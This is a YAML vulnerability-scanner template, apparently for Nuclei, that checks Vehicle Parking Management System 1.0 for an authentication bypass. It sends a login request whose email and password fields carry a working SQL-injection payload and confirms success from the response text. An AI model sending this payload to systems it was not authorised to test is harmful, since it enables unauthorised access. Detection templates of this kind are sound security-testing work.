id: vpms-auth-bypass

info:
  name: Vehicle Parking Management System 1.0 - Authentication Bypass
  author: dwisiswant0
  severity: high
  description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
  reference: https://www.exploit-db.com/exploits/48877
  tags: auth-bypass
requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/login.php
        Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8

        email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "LAGOS PARKER"
          - "Login Successfully"
          - "location.href = 'index.php';"
        condition: and
        part: body
      - type: status
        status:
          - 200
